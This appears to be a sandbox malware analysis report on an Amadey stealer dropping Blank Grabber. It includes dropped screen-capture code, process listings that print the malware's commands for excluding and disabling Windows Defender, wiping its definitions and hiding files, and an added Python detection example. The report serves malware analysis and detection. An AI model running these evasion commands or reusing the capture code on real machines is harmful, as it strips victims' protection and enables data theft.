Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category:dropped
Size (bytes):609
Entropy (8bit):5.2929243924680005
Encrypted:false
SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fD:p37Lvkmb6KOkqe1xBkrk+ikqB+WZE25
MD5:BDF8A32760C919FB339DFFDDDC8A68E8
SHA1:24750C320AC4D47A92B6B93C03543E60ACBA6F0B
SHA-256:E0B09426325110F90343435C71E9EB1C49DE228EADBE52FA8A340C5EF589B4CA
SHA-512:DAE3A98EACD64BED0885D180E55B549501C4B036CF5F45792BD2E0662C599407A230AF75848324D495283A7FAEFEC15C86D1F4A2DEA023DF7F2FEBA55E37252A
Malicious:true
Reputation:unknown
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.0.cs"
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.1492159416705823
Encrypted:false
SSDEEP:48:6o7oEAtf0KhzBU/cf6mtJ3N05pW1ulSa3mq:INz0zmfO5EK
MD5:85FBDED3E99C6FADA984AC77141F7F98
SHA1:B08DA3FD3FCAC051EEBFFCF708246FEE96352203
SHA-256:A32C6F14520630FE83CEFEDCEFA0E8338FADA1CCABAAE434C90685C7E93C1876
SHA-512:0BC016EEB150FF376AD46A02A60017EB46E57D442DC642793E0B0CE977DD9A94D426C9EB19FE7878C2152B96968CA15EC973FF4C77A7227E070ED944C69A46A3
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
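The .res, .0.cs, .cmdline and .dll artifacts above are the footprint of PowerShell's Add-Type: the C# source is written to %LOCALAPPDATA%\Temp\<8 random chars>\<same>.0.cs, csc.exe is spawned by powershell.exe with its arguments supplied through <same>.cmdline, and the output is <same>.dll, here a Screenshot class compiled against System.Drawing and System.Windows.Forms. The added example below (not part of the report) turns that footprint into a detection over process-creation events; the expanded csc.exe arguments are copied from the .cmdline artifact, while the event records, the @-file form of the command line, the benign MSBuild event and the field names are constructed for illustration.

```python
"""Flag PowerShell Add-Type compilations in process-creation telemetry.

Added example, not part of the Joe Sandbox report. CMDLINE_ARGS is copied
from the report's l2sopuet.cmdline artifact; the event dicts, their field
names, the @-file command line and the MSBuild event are constructed.
"""
import re

# Add-Type compiles into %LOCALAPPDATA%\Temp\<8 random chars>\<same>.dll and
# hands csc.exe its arguments via @"<same>.cmdline" in that same directory.
SCRATCH = re.compile(
    r"\\AppData\\Local\\Temp\\(?P<dir>[a-z0-9]{8})\\(?P=dir)\.(?P<ext>dll|cmdline)\b",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_add_type_compile(event: dict) -> bool:
    """A .NET compiler spawned by a PowerShell host that reads or writes an Add-Type scratch dir."""
    if basename(event["image"]) not in COMPILERS:
        return False
    if basename(event["parent_image"]) not in SCRIPT_HOSTS:
        return False
    return SCRATCH.search(event["command_line"]) is not None


def triage(event: dict) -> dict:
    """Fields an alert should carry: scratch dir, referenced assemblies, and whether the
    reference set is the one screen capture needs (System.Drawing + System.Windows.Forms)."""
    cmd = event["command_line"]
    m = SCRATCH.search(cmd)
    refs = [basename(r) for r in re.findall(r'/R:"?([^"\s]+)"?', cmd, re.IGNORECASE)]
    return {
        "scratch_dir": m.group("dir") if m else None,
        "references": refs,
        # Empty when only the @file form was logged: then open <dir>\<dir>.cmdline itself.
        "gui_capture_refs": {"system.drawing.dll", "system.windows.forms.dll"} <= set(refs),
    }


CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Arguments exactly as recorded in the report's l2sopuet.cmdline artifact.
CMDLINE_ARGS = (
    '/t:library /utf8output /R:"System.dll" '
    '/R:"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" '
    '/R:"System.Core.dll" '
    '/R:"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" '
    '/R:"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" '
    '/out:"C:\\Users\\user\\AppData\\Local\\Temp\\l2sopuet\\l2sopuet.dll" '
    '/debug- /optimize+ /warnaserror /optimize+ "C:\\Users\\user\\AppData\\Local\\Temp\\l2sopuet\\l2sopuet.0.cs"'
)

EVENTS = [  # constructed process-creation events
    # 0: what EDR usually logs, the @file form
    {"image": CSC, "parent_image": PS,
     "command_line": f'"{CSC}" /noconfig /fullpaths @"C:\\Users\\user\\AppData\\Local\\Temp\\l2sopuet\\l2sopuet.cmdline"'},
    # 1: the same compile with the .cmdline contents expanded
    {"image": CSC, "parent_image": PS, "command_line": f'"{CSC}" {CMDLINE_ARGS}'},
    # 2: an ordinary build, not flagged (parent is MSBuild, no Temp scratch dir)
    {"image": CSC,
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": f'"{CSC}" /noconfig /t:library /out:obj\\Debug\\MyLib.dll Class1.cs'},
]


def flagged(events):
    return [i for i, e in enumerate(events) if is_add_type_compile(e)]


if __name__ == "__main__":
    for i in flagged(EVENTS):
        print(i, triage(EVENTS[i]))
```

Add-Type is also used by legitimate administration scripts, so treat the hit as a pivot rather than a verdict: pull <dir>\<dir>.0.cs from the scratch directory while it still exists, and, as here, let the referenced assemblies tell you what the compiled code is for.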
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category:modified
Size (bytes):1152
Entropy (8bit):5.470904781379983
Encrypted:false
SSDEEP:24:KLNohId3ka6KOkqeFkqNE28Kax5DqBVKVrdFAMBJTH:2N8kka6NkqeFkqNE28K2DcVKdBJj
MD5:140EC8ACCB996DAA0BCA5443CD9AA204
SHA1:39C4487EA45576A3C8DCC32601E702E4E1EC74C8
SHA-256:FC3BDB65DDCC2F963CE9583114B98AB739C6F9ED45D32B7D1187E84B047ED254
SHA-512:C7BE9F4953B863F1BC95294584533DECB5EF8DC48640F4284CFB34F7DFFB96682552B9130B1ABE119DB037CEC3BD8E4A9D7A3FC1A1F1E8C410411C6F2AC7E342
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                        Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo
Process:C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):758686
Entropy (8bit):7.9997493017828285
Encrypted:true
SSDEEP:12288:VwYIkQxqdnvV6wxSP4pQm4JW6qI4Koy1CtPPpPVR4L8zC4:VwYZQxqVvNpwJW6z7oBRdRm4
MD5:FB4B12411BBF00753EB2FC9CFB3E67BE
SHA1:4183E9434179EE82DC386560E2818DEB7A3C4E86
SHA-256:9688957B5EF3EF7C6DF96213BF16074514D971BEA9E450B6315EAC5ED016817A
SHA-512:5BB41A5C53D645D03A5CFD35029B15B0D8706E38BF0948EF50E1D85CCCE3CB50096D5600EBF5850733BB108479CC7CFC86D26E8FF1198909E07329621953370F
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                        Preview:Rar!......;.!..........."0..3..yt...O..a`.b..i[....Cf..&.X.7.-.. ...dsV.8.;..x...$......?h..../.c...P..`m...<.w1.....zk.2u.T0...rD....X.`c.!..p......f.SF....J...9.s....n_~..O.S..5....<....u0u].W_`.G...\.....Rl.B.H.f..qk@..Q!L.M...$.....S..q..x1.LG.Y./.).=z..MJ.oT*-..?L_..v.<......iv....r^.KHp5......e!.;*.8R_..WL>..Y....e....G. .....1... .$...kf...p.`C.Z.l.8!..._4.T...V..&.........S....d"T.z.^.^...e..!.}uz.]m..l....K..N.s.s.33. .X@5..8..G.}...\ ..>...Z..K..2O.....bn}".g..C..CX.cB,[..t{,,. ...f...Y..2..E...')..@.t...6...K<.oF(....w[.4....\.D......%=~N6.N3j..J!../=U.....T....7...R...G.8%...)eM8....'s.:.o...'...F.f..R..;......|...x&.J..z_.....c......+....}.6)...Q..#.2....7..-.."..#....V..iR._v.e.</y+r.bY=...?|..6.&..3....`.8G.1.(..wn...1.pz...Ia.....'..w.5.o.B9}......BP.....i..B!..o......k....#...9&5.[r.SlE:"2.s`.(.XW...C..[.rF..&..(].]......"S....Zw[..J."K.....7......&K..o#..-........E..."H..5t...y.{wcz..J+{m'.x...=[.+.!5l.:I..M.r.@.
Process:C:\Users\user\Desktop\file.exe
File Type:data
Category:dropped
Size (bytes):290
Entropy (8bit):3.4196376856720923
Encrypted:false
SSDEEP:6:RnX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lHtbut0:JuQ1CGAFifXVH8t0
MD5:8CF96DE3B335E6E86EA8DD5AF3AC923A
SHA1:82AB675AB274FC1C244FF05F41706DAEBC43D00B
SHA-256:09D868876787ECA5ED7538E41E0E9610BB9686189093D6EE95EF20B793BE23F1
SHA-512:ECA146EB71178125F2BFFDFE33407D9BC2FA69FA9582231F32F98813615719DB91500C685E96EAB792560D9CACABA718056DAF3D6C7E94BDCE7E2F3EA3EEC027
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                        Preview:....$i..lGTE....CqJ.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):97
Entropy (8bit):4.331807756485642
Encrypted:false
SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:195D02DA13D597A52F848A9B28D871F6
SHA1:D048766A802C61655B9689E953103236EACCB1C7
SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:false
Reputation:unknown
Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.54792183955597
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:file.exe
File size:3'037'184 bytes
MD5:cd7686b11754d77b8722880a1a3a9a43
SHA1:ea1c00d2985812539452a31d8f75506573dad692
SHA256:a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944
SHA512:64d095a52c5a9987cbdbe00c95cd96db67d5bf9faa9a53c1132eab27be7d0d8b7adf209195db8b925c6453ada759165ecfc8c1a5ac4f3ea7d3427fea2b643cab
SSDEEP:49152:30HhKY2JwV6AskokjOnIY/cy6oMjYnJpY2Q2AM6J6OK:3mAJwV6AsFkiIycy6odnJ1Q2AM6J6O
TLSH:CEE55B917405B1CFD48A177B8967ED42699D03B9072148C3ACADB8BEBDE3DC116F6C28
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
Icon Hash:00928e8e8686b000
Entrypoint:0x720000
Entrypoint Section:.taggant
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F5E60E7752Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x5d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x31e72c | 0x10 | uyplpdnx
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x31e6dc | 0x18 | uyplpdnx
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x680000x2de000a256f1eb2abd685c0b69a2b7f39c3d5False0.9983768307220708data7.986412821940457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x690000x5d40x40081df49c5cf11a93a5c587a846bc83433False0.712890625data5.81508100210508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        uyplpdnx0x6b0000x2b40000x2b3e00f02aad462a0c4c276d3d415f7cb39b81unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        lxepjdzt0x31f0000x10000x400a60aee545c16d449b7fa585cdcacd2b9False0.7548828125data5.926614948636206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x3200000x30000x2200822ce7b0a23a7c86a80aaeda0e4cc1bdFalse0.05778952205882353DOS executable (COM)0.7032949026486868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x31e73c0x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                        RT_MANIFEST0x31eb200x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States
Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.
Target ID: 0
Start time: 16:10:09
Start date: 19/12/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x260000
File size: 3'037'184 bytes
MD5 hash: CD7686B11754D77B8722880A1A3A9A43
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2205661447.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 16:10:15
Start date: 19/12/2024
Path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase: 0x690000
File size: 3'037'184 bytes
MD5 hash: CD7686B11754D77B8722880A1A3A9A43
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2270058738.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 16:10:15
Start date: 19/12/2024
Path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase: 0x690000
File size: 3'037'184 bytes
MD5 hash: CD7686B11754D77B8722880A1A3A9A43
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 5
Start time: 16:10:39
Start date: 19/12/2024
Path: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
Imagebase: 0x7ff67aed0000
File size: 6'291'456 bytes
MD5 hash: 63EFECD388A74A9CDEB79CD7C8020E7E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.2469304797.0000027326167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.2469304797.0000027326165000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
Reputation: low
Has exited: true

Target ID: 6
Start time: 16:10:40
Start date: 19/12/2024
Path: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
Imagebase: 0x7ff67aed0000
File size: 6'291'456 bytes
MD5 hash: 63EFECD388A74A9CDEB79CD7C8020E7E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.2983797651.000001FA2EDC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe""
                                                                                                                                                                                                                                        Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
